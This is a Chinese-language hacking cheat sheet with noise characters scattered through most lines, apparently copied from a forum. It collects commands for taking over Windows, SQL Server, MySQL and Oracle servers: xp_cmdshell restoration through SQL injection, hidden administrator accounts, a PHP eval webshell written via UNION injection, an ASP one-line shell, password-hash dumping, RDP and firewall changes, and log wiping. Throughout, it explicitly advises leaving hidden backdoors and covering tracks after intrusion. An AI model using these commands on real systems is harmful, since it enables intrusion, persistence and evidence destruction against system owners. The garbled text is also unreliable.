. _5 {9 r* b u5 `) Z" ?
1.net user administrator /passwordreq:no( a7 _0 R# J8 a9 r. Z: L: P
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
( O8 M9 f" C6 E3 Q- _2.比较巧妙的建克隆号的步骤! I( s% `% W! W
先建一个user的用户
0 Y& i) I' {! Q然后导出注册表。然后在计算机管理里删掉
! D9 n0 e' l! W& m5 }0 g4 G3 U在导入,在添加为管理员组" B# u8 l' L* Q# i
3.查radmin密码
9 I# h$ W3 L2 ?reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
: V! J/ s3 n) `' U G, U, P4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
4 a8 E* c7 o9 \8 F建立一个"services.exe"的项( ?2 w% P( R; ~' _* J
再在其下面建立(字符串值)
$ t6 ~0 i1 Z' F1 k% l# _+ n键值为mu ma的全路径# R7 A3 c% s0 a7 L( k
5.runas /user:guest cmd4 B) J7 j% E; r
测试用户权限!- C. w l$ P6 ^) h
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
, E; `, u T. e; [$ c" |9 C0 [7.入侵后漏洞修补、痕迹清理,后门置放:
9 u- h. S1 h k/ b9 V; ^- u, ?基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门8 {1 B! U/ Z0 d
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c( ]( H S" J1 T% h n7 d: u
$ [4 C& Y, X A3 zfor example2 B/ G. d G. ^/ ?* k
6 ~6 ^" S+ ~# i0 s1 Y$ _, {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'! V! V7 [: N# {
+ D+ R7 H5 _# R' ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
" U* ^* }" A) l3 K- H/ b; `6 l+ B7 O
/ S+ D$ J( _; O9:MSSQL SERVER 2005默认把xpcmdshell 给ON了! f8 P: [! `2 c
如果要启用的话就必须把他加到高级用户模式7 T' s+ I2 Z9 N& r4 U
可以直接在注入点那里直接注入
2 P& \" v; c r9 W# b% P: lid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
1 `6 T. J$ J; Q$ k) W9 |然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--3 t5 n' r0 d( F" W$ s! \
或者% E$ ~6 n* j" v# x
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) ?8 ?. q0 X9 T/ ?/ W2 [来恢复cmdshell。1 P/ I# _* k2 H- U
$ r4 `1 U3 t$ @, ^
分析器0 v o7 \6 O& T- x3 K7 [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! X! }; f. q5 {' t2 w f, ?
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
: `( ]& k! C$ X) j/ q$ l% K v& z10.xp_cmdshell新的恢复办法. b7 X; E$ y/ q, @' n$ s M
xp_cmdshell新的恢复办法
* Q4 }& R* h8 J( F% Z& a$ F; C扩展储存过程被删除以后可以有很简单的办法恢复:
) B4 h' `" l1 L' i0 |, n删除
" J4 L( D) r. x' C' _) ^drop procedure sp_addextendedproc
) T5 u+ l" Q* Rdrop procedure sp_oacreate
5 i! f+ P6 K3 J C% v+ p/ Rexec sp_dropextendedproc 'xp_cmdshell'; w& w4 F! p2 H; Z5 K! e
# D6 i* ^: N5 E6 h {0 b% x* Z恢复
( I7 f5 [* d% H& Q" I% v9 H. Pdbcc addextendedproc ("sp_oacreate","odsole70.dll")6 l: m' e7 q5 T0 s5 |
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
6 ^* L2 v& f* M5 Y
+ C. {& S( s% R- _9 [这样可以直接恢复,不用去管sp_addextendedproc是不是存在
/ J' p6 x" a- v6 a. o+ b A4 H/ ~: e: d; E) ^" O
-----------------------------
* v m z) @0 _) F6 Q; e
2 B6 u; s. t" P8 Q" a删除扩展存储过过程xp_cmdshell的语句:
. z1 Z e( G8 g* {9 R: P- zexec sp_dropextendedproc 'xp_cmdshell'6 Q7 ~- }- I& n7 l$ l
* A' M* w h( d+ \+ Z$ r
恢复cmdshell的sql语句
+ G* C- c1 Y7 c' b2 Nexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" m0 n6 n- S; F8 k: p3 u
* D4 R5 I8 L, d: X# [; M
c% R( J& }$ z5 S" q开启cmdshell的sql语句5 o* m f6 j7 e( |
6 ~& j$ [4 {- U$ N- C4 |1 {7 Z! X) }
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'1 \; \7 d0 s. o8 I/ o& z
2 ^* B. j& T% J9 D+ \4 K判断存储扩展是否存在& h; W9 T4 g6 z" O
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. |4 R' {# n# Q, e% I返回结果为1就ok9 \. ?5 n5 f) Q! i* I6 P- f
3 s ?/ {+ Z4 g5 D
恢复xp_cmdshell. t- ]. Q) O: z% k; L
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'( g) X& o+ C9 A9 \
返回结果为1就ok
, _$ Q# W6 N- M$ w6 w) W% ~# c5 ?/ c( i7 v
否则上传xplog7.0.dll
" p' p b7 J3 V s: k* B+ Hexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'0 k) j: [/ Z. b- `: E) t% v7 y. L
. x' D8 V! S5 E1 b; @! J堵上cmdshell的sql语句
& V5 U9 ]" O& ^sp_dropextendedproc "xp_cmdshel& `1 s2 B, x: t& C
-------------------------; i8 O4 P* w! e7 H
清除3389的登录记录用一条系统自带的命令:
+ r! e) D; L# y4 b& N' s! E; H3 i; xreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
. V0 b, l, w* |" w% t8 W$ y. }9 T! B# |' g9 ?5 X; r
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件1 R1 y: Q2 Z' l" s& Z% J8 m
在 mysql里查看当前用户的权限, u: C: R* z2 ~
show grants for
# W) ~$ y# ~& D0 _8 F
4 y: d( K2 g7 P以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。 {3 H" u( v) R( A p
3 l' F1 ~0 h6 |9 d% U8 ]4 S6 D6 _; Q y9 f, ~ x5 N/ e8 j. U f
Create USER 'itpro'@'%' IDENTIFIED BY '123';# |% i7 Y. `) J& ~
, a; m; K2 h* g0 i0 y) `" y8 yGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
0 f7 w. T- F/ t5 z& r
# r% F; P8 `+ |0 ]0 U1 Y, nMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 09 {/ g. ]; r- _4 k H; Q
$ p% h& X5 F0 V: aMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
+ Y' m6 ?4 ~) {- g1 ]6 e- T- @# l8 _ R$ c2 v/ n$ t
搞完事记得删除脚印哟。
9 h9 }( l, V0 t$ V( `; q# M. B2 A0 m2 a' X/ V0 F# Y( C/ P
Drop USER 'itpro'@'%';
, w; ` r1 j5 K
- k; X& G5 f7 ?2 f& Q( s f1 oDrop DATABASE IF EXISTS `itpro` ;
& ]: S8 s! J& v2 `( Z. R. w
" X3 y# @$ Y2 m当前用户获取system权限1 T' s4 b8 ~/ Q$ P9 p3 A
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
% k2 K' \& j2 Gsc start SuperCMD
/ h) A3 K7 I& u/ T! [& {8 b程序代码5 W& |5 G: s2 V( y5 B# T
<SCRIPT LANGUAGE="VBScript">
5 v& u* S2 V; j# ^7 Wset wsnetwork=CreateObject("WSCRIPT.NETWORK")" @8 _* j7 N8 Q* T. P
os="WinNT://"&wsnetwork.ComputerName
& O3 {: H9 E2 ]9 _' D1 iSet ob=GetObject(os)
/ Y& H" c. [& z) f* F7 SSet oe=GetObject(os&"/Administrators,group")
7 e% q( [5 B( o0 D$ ~. BSet od=ob.Create("user","nosec")
: X& w; [* m1 r8 `od.SetPassword "123456abc!@#" s A3 z# x2 T# x2 ]& n- T- f
od.SetInfo( E+ y( i- a, ^2 J, w: I
Set of=GetObject(os&"/nosec",user)' k4 e! G: f4 U( G C- ^
oe.add os&"/nosec"
" l5 y8 T6 U5 \% T</Script>9 Z4 n+ o- a' S
<script language=javascript>window.close();</script>
% r5 u% O9 b. s8 }4 s- E" Q7 @2 w, D0 x% i0 m7 K0 E- I t/ n
$ e0 y, y- C' @2 k
7 V; e7 T- ^4 n9 m' X& d, Y; G
$ p2 |! H z3 _% b
突破验证码限制入后台拿shell
" Y5 y, s- ~8 F n' }程序代码; N' ], w6 m, h7 s5 L( X
REGEDIT4
% z4 B/ K! {! T \; F( O[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
- E" Y' i4 A0 `- d" O"BlockXBM"=dword:00000000% ]+ C" E6 D8 Z
# G& y7 c9 h! p保存为code.reg,导入注册表,重器IE
! x/ W I9 G: b# {就可以了
& U, t( s5 F+ }6 m k/ ?1 Funion写马% Q! b0 c" D4 M8 ]' j# h( o ?
程序代码7 l2 p; H+ O* b2 b0 N# u7 ]1 @) S$ R
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*4 d- m$ x% l: O% S) P2 A, ?( F
* Q+ P8 u' b: R) L- L6 N应用在dedecms注射漏洞上,无后台写马- n ] c V" u- z! q
dedecms后台,无文件管理器,没有outfile权限的时候/ x# M9 g K. @/ p! C0 `
在插件管理-病毒扫描里; L: B4 F1 S) q, V6 M9 u6 K C
写一句话进include/config_hand.php里5 N9 E) a& r M3 `
程序代码3 t; f" i! v P `+ q: D+ J f
>';?><?php @eval($_POST[cmd]);?>
' q9 [! g, H& ^# C& h1 u; _
2 a* j3 e& |, W$ ?" h
' r8 `& ^# g" Y, E5 d( O如上格式' ]1 R$ j0 n8 `' ]
7 C+ L8 C8 z, |) _9 X+ R) Doracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
; k" a0 w0 k) n/ B程序代码; T! H% D! g" ~9 U* _9 B. `
select username,password from dba_users;
/ F' v) \: W1 [$ f6 c% Z2 X2 V; T: I
! {4 q1 ?7 B' Kmysql远程连接用户
+ u9 X H5 |5 W& L% p( V$ v/ \% p' B程序代码
, k9 R, ?; Z% m$ a G/ e, G9 G/ ^; O2 h
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
$ e$ u* m. Q+ f0 [3 d( mGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION& H6 H( z% k; [- _6 p
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
/ y8 W7 i% O+ B& s& U# d& j/ g5 QMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;3 ~, p% S7 p# x
9 P- {; {; o. d4 Y3 N% H
) T! B9 G. Q" t! Z$ q' z# s
( u! @0 ~! X5 E2 ]
, q( A" c4 b2 M) n/ o2 |echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
; W" N, ~0 [$ }( f* W
7 y, \) _2 O8 j1.查询终端端口7 b4 {! D: e5 e; `2 n( L) Y5 f5 m
* {) D- X6 \& {# \: z
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
7 z. x, B: X$ w: _: s- P5 f
+ B2 q d: x% T通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
, {0 o# l5 m% Wtype tsp.reg7 i( \4 P2 j4 Y( ^1 X
. j8 J, Z' w& h/ H2.开启XP&2003终端服务
# M* g! L, I! p2 h
, ]; v& ] b" a- E8 j; O; ^, \, Q5 M# r$ j
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
" R# q! s% z8 ` d' T* J2 j
' e3 M! G; s3 d$ [0 O9 C$ f
5 M( t* s, a& ?. U- w& IREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- f2 o1 v c# n* z( A: z
1 g, ]: w3 A/ u Q3 |4 s6 _6 o3.更改终端端口为20008(0x4E28)
0 C: R- b& B; k( C( [. \
" o2 q0 y6 ]% G( V$ BREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
7 B( P% g: g t3 ]. E- F6 j
7 }5 n; A' f u x7 \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 V7 ?9 b' ]7 _2 A6 X
2 P" W! M ^9 _& K7 g. |4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制/ a* N5 P6 j1 I" Q4 ^; R
) B4 @6 |4 T3 i) \7 w: n7 d2 F
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
' }* c% n( i' _ A3 k" a8 P7 ~8 `' o9 a4 n2 o1 |
; H6 L6 M4 Y( _/ o& }& g: X) |5.开启Win2000的终端,端口为3389(需重启). V/ ?- F6 w+ j( i- D' d
: F/ m. q1 C" wecho Windows Registry Editor Version 5.00 >2000.reg
7 f. d( l. p8 p- ]echo. >>2000.reg/ _/ _; B) s2 v5 f
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
: Z" Z6 w$ w4 secho "Enabled"="0" >>2000.reg 4 D* s( d- B9 M5 B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg # ^& ~4 k- h" O0 P
echo "ShutdownWithoutLogon"="0" >>2000.reg
/ Z+ M/ I6 ~9 H+ P! e0 jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 9 q5 T: f. E- ~
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg + w' l+ \# C. F8 ?' S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg % i! p/ Y" Q$ H7 L. t
echo "TSEnabled"=dword:00000001 >>2000.reg 3 P% [# Q' [+ T0 O% a8 z% ~2 R0 l4 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 9 u. Z3 o* u b) Q5 r5 r1 h/ P/ H
echo "Start"=dword:00000002 >>2000.reg $ c/ ]( Z% E! b- x8 w2 W7 q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
( e8 d/ J* n$ `3 u( d1 ?echo "Start"=dword:00000002 >>2000.reg
3 F5 m d9 r% `" `+ xecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ! O- S1 N- v, q6 ~- }
echo "Hotkey"="1" >>2000.reg e7 \% `$ h1 G& i, |. |3 w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 5 o4 D( ]7 N- C0 M; g) B
echo "ortNumber"=dword:00000D3D >>2000.reg
1 _# k- f" u4 `; h& Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ) R1 s" e; I: }. @+ D
echo "ortNumber"=dword:00000D3D >>2000.reg; Y% ]; ^( V4 m7 _
, I& W. |# U: p8 h7 f
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
/ l4 ^( y% |; f1 K7 @& V
, Q, O5 I& y! y1 ?9 ~( O {9 n@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
; E% B/ U' U- ?- `6 R: }) [(set inf=InstallHinfSection DefaultInstall)* {6 I/ t; e6 P- T" D, {
echo signature=$chicago$ >> restart.inf
6 ?" y4 R) C+ m$ Q. N# Q+ p& Fecho [defaultinstall] >> restart.inf
8 I7 o# n: u' b$ x$ r' l$ }7 l" |rundll32 setupapi,%inf% 1 %temp%\restart.inf
; E' q% i: X) h3 _3 g$ D% l, w1 [* l6 z& j
, }4 l5 f% f/ g' ]$ V5 s
7.禁用TCP/IP端口筛选 (需重启)
6 y" ~: a- v! \$ X6 ?
, Q% F; _) \5 q, O% EREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
+ E5 z# I6 Z( p8 m% s2 c
, N0 d7 x5 Q( u7 ]$ ]4 D8.终端超出最大连接数时可用下面的命令来连接5 _" E4 E$ t2 r
$ V- y; C9 p, d) W
mstsc /v:ip:3389 /console
8 o- P1 o& M1 r6 e2 x, I' f2 y+ Z, ?6 p; }
9.调整NTFS分区权限
- M$ A% W7 X1 R3 I2 @0 o7 P2 M& K1 O
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
2 K/ x; \2 }+ c( p! v$ |8 x7 `
* L2 o: C3 e$ J, W" c5 _cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件) w% U# B$ V3 W7 M1 o$ ?
& D: r, K2 d; `% d6 W2 W4 n
------------------------------------------------------) O, s o, D+ E2 Q: ~
3389.vbs 0 h$ N" p9 D* r6 M9 y$ ~! O, b
On Error Resume Next/ p& Z y' M* x* \
const HKEY_LOCAL_MACHINE = &H80000002$ Q4 Q( P3 i* ^
strComputer = "."
( F( [9 q0 n* c' \7 DSet StdOut = WScript.StdOut$ ^- G3 Q( ?9 J7 x; |
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
+ L6 V1 G* _& g* o! v+ OstrComputer & "\root\default:StdRegProv")
- n" r" Y V& vstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"$ i; |, \4 j& ^( K3 F3 z7 I: ]
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath0 _: S2 R' j4 [
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
1 K0 q( Y3 u" s! ~0 M0 eoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 Z0 u1 x6 m$ |( K6 J2 J
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"$ J2 q" A' @8 e2 c0 G, m5 r
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 n; T; }+ r5 D
strValueName = "fDenyTSConnections". L: q) P6 _+ z; I% J1 {5 G" N% {
dwValue = 0* F6 V6 G1 p" K# |9 R
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 f* c8 G* I6 I/ l( C. v' v* PstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
, O/ W3 q, ]' U- u* }* T2 @strValueName = "ortNumber"
+ r7 c+ N( O' D$ W, C1 E; [dwValue = 3389
- Q+ I& l' j# e; t# moreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" k, R# @0 |: m# a* ~# e& HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
0 u, i, ?+ h( s& rstrValueName = "ortNumber"
' @, H3 H% B# E/ q6 w5 e! @dwValue = 3389$ u& e6 B# F7 ~- i! h& e
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' B3 t) i& v4 ?6 A, j. m& m" bSet R = CreateObject("WScript.Shell")
& n6 b' R2 k% P8 [R.run("Shutdown.exe -f -r -t 0") - {& j8 q: M& z; N; b
. P4 W* J8 t: x) T/ s# O
删除awgina.dll的注册表键值
7 O8 k( H& V6 B1 X( Y+ Z程序代码# \. ~( M5 o P1 P! c; o: ~7 m
. \2 J1 E; `5 a% a3 \) F# t# I
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f, Y1 F2 ^( ]0 q4 X& m7 b# Q7 M, @; l
2 C8 {) u" Y( O
M- _# A6 R$ K" R( C1 y8 Q0 V& c+ n; z R/ g6 G
7 @, A( w+ l- r$ D! ]' b# Y
程序代码' p2 [) y5 U6 n' g( u- ~) G
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash0 i4 ?7 |6 R& @0 ~
" Y! O9 R0 a/ a- Q" O. _% X设置为1,关闭LM Hash
3 m6 C" a: B3 _% U O- q
& e6 V: W+ Z a/ n数据库安全:入侵Oracle数据库常用操作命令# ], j- J* x% m% R7 d. r! U" Q$ t
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。( y& J6 R5 @9 z3 s2 B8 f8 C
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。4 w h3 H% E# H0 j8 |
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;9 R0 X; [' z3 h1 G" E- o$ C \
3、SQL>connect / as sysdba ;(as sysoper)或3 e) s7 b: V; c! [0 w; {2 _
connect internal/oracle AS SYSDBA ;(scott/tiger)7 |2 ]5 v% r8 {1 O- R( r/ U
conn sys/change_on_install as sysdba;5 ?) C: v6 u& k
4、SQL>startup; 启动数据库实例3 S3 H+ v' |, P3 k4 @4 ^
5、查看当前的所有数据库: select * from v$database;& u# \+ C( l) c9 l! {
select name from v$database;
3 ^: C! o9 P9 A9 b6 D ]( O6、desc v$databases; 查看数据库结构字段) V0 [) L7 Q# j+ N# i# B
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:/ U/ p1 E# Q" [/ h& ?
SQL>select * from V_$PWFILE_USERS;3 W4 ^" j, q* h7 _& k4 \6 Z8 Y
Show user;查看当前数据库连接用户7 u- {# e J! F
8、进入test数据库:database test;$ j, [- k+ P; K. L% s! d+ [
9、查看所有的数据库实例:select * from v$instance;
5 W" a7 M# n: O4 y( F如:ora9i
; P3 g# a8 a6 [- q5 I: R10、查看当前库的所有数据表:
" D1 U/ s- ]# C; LSQL> select TABLE_NAME from all_tables;6 b, T6 K9 L9 K$ k8 A6 o" N9 ^! r
select * from all_tables;
. z, b: x7 T5 E5 m" L. ASQL> select table_name from all_tables where table_name like '%u%';" I) j" R4 C) {% k) ^ e7 c
TABLE_NAME
* g* z0 O+ r2 X- x! E* d------------------------------" `8 X1 T8 _& R# ?' x; x) _: Q' `
_default_auditing_options_7 @: B. q. k0 {$ I* I
11、查看表结构:desc all_tables;
2 r8 @2 u: ? N, F12、显示CQI.T_BBS_XUSER的所有字段结构:% W2 u4 u0 X$ V/ G4 F1 ?
desc CQI.T_BBS_XUSER;+ ]& R$ H5 T. k* e/ P0 Z: g
13、获得CQI.T_BBS_XUSER表中的记录:" k% Z% W* d ]( Z5 A4 E2 E+ M0 U7 I
select * from CQI.T_BBS_XUSER;5 D1 x+ _. k+ W* w2 Q1 ^
14、增加数据库用户:(test11/test)3 Y7 R3 R/ p8 R. I# I
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
6 y2 f, w; T0 }' t: Z- H+ b" n15、用户授权:
" s$ E5 Z/ U, Y7 fgrant connect,resource,dba to test11;. O' W7 W( U/ L- U$ ^) i) `
grant sysdba to test11;
9 y4 z2 }; e! n6 J4 \commit;
. U7 }! \& c/ Z16、更改数据库用户的密码:(将sys与system的密码改为test.)
6 C/ u: n/ k/ b: a- Zalter user sys indentified by test;/ @3 f$ y4 }! u: O; ?# s: H
alter user system indentified by test;
) _- ~7 T0 a; W+ a4 N$ V, h h' Y6 T6 p8 x
applicationContext-util.xml
7 |' T+ Y7 S# |+ V0 g* ^0 tapplicationContext.xml
. x" V2 F& T+ v$ N5 T, w6 }' U: ostruts-config.xml# p5 [5 X% d/ N+ C v* j
web.xml# H+ F& X% r0 T0 h7 i4 X
server.xml
" l7 s6 C6 j' j+ Xtomcat-users.xml" A1 z! u+ {) Z! i# [
hibernate.cfg.xml& R v% j9 O/ T3 s
database_pool_config.xml6 a* g) ]9 C( m" o" A7 `
. I* Q5 u% H0 Y: h: v
- v: A: {" Y, v% z
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
0 u `* S2 I1 b6 h; F\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
; M, E9 P9 L* p. G$ A; ~. i c% ?\WEB-INF\struts-config.xml 文件目录结构6 V* w$ [# {3 v8 D
: e2 I4 O2 Y; e, J4 [spring.properties 里边包含hibernate.cfg.xml的名称 j G/ H) s1 P! k8 `9 H, b. l7 B
3 R: T6 C: |3 p8 f& Z1 b$ ]6 C
4 f6 E0 _9 D1 _. D) ^
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
1 e4 N) c/ ^ o; [, n1 c9 \% k D7 Z3 _& J, V
如果都找不到 那就看看class文件吧。。. {! l I5 |2 }+ C8 V
5 `) f" f9 h# }2 c4 s0 c6 {" ]( _测试1:
; O& D, c/ W+ a F$ @% y( USELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
0 I2 u' Q- B. v0 G1 M2 m
' ?" j, l U: _* x# u% Y* ~测试2:7 H9 C; o, @$ |6 Q. N" I
! V) N, f1 u$ y5 i0 W
create table dirs(paths varchar(100),paths1 varchar(100), id int)- j7 i7 j; z; t- [* [
; v' K( G: G$ v% D8 R' M5 a2 X; r
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
4 v _7 N" q, t6 R
; [& S+ B9 \+ a4 q9 @2 g ~SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
$ Y: z* M# C6 k; W
y1 _9 d: _9 \1 U- u6 f3 ~4 K查看虚拟机中的共享文件:8 g/ U* v3 W( a- S% {6 v! J! O/ T7 @
在虚拟机中的cmd中执行
) ?, n) y4 N+ _9 n& y\\.host\Shared Folders& t( ~6 Y2 f I. C& H
. ?" g5 Z5 s9 f7 G. ?) Kcmdshell下找终端的技巧' K3 n8 \# O. m
找终端:
6 f. _6 y6 u$ ?6 D4 H第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
" i% C/ K1 { o 而终端所对应的服务名为:TermService 6 W% e- ?0 o+ X8 f1 q1 @! D9 L
第二步:用netstat -ano命令,列出所有端口对应的PID值!
2 j7 R, r* m5 i' C' X 找到PID值所对应的端口7 b0 R# c; R3 H- E( p
3 s. `& `! }& o% ]- u' O @. c
查询sql server 2005中的密码hash# f4 }8 f4 h& J& y
SELECT password_hash FROM sys.sql_logins where name='sa'
- ~* X. T2 ^, Q9 `' |SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
0 Q8 w; ]8 {% ^" C8 maccess中导出shell
3 G, n! f* p4 {' @! T a
, C+ A% Y/ z4 x- N. ?* r中文版本操作系统中针对mysql添加用户完整代码:0 P ~8 y- e5 Z$ F% ^: h+ A$ I( v
7 B% ~: q0 G$ l: w% X
use test;
' v3 l8 q# R' [3 }+ M5 xcreate table a (cmd text);
! M5 o: b; Y/ Linsert into a values ("set wshshell=createobject (""wscript.shell"") " );
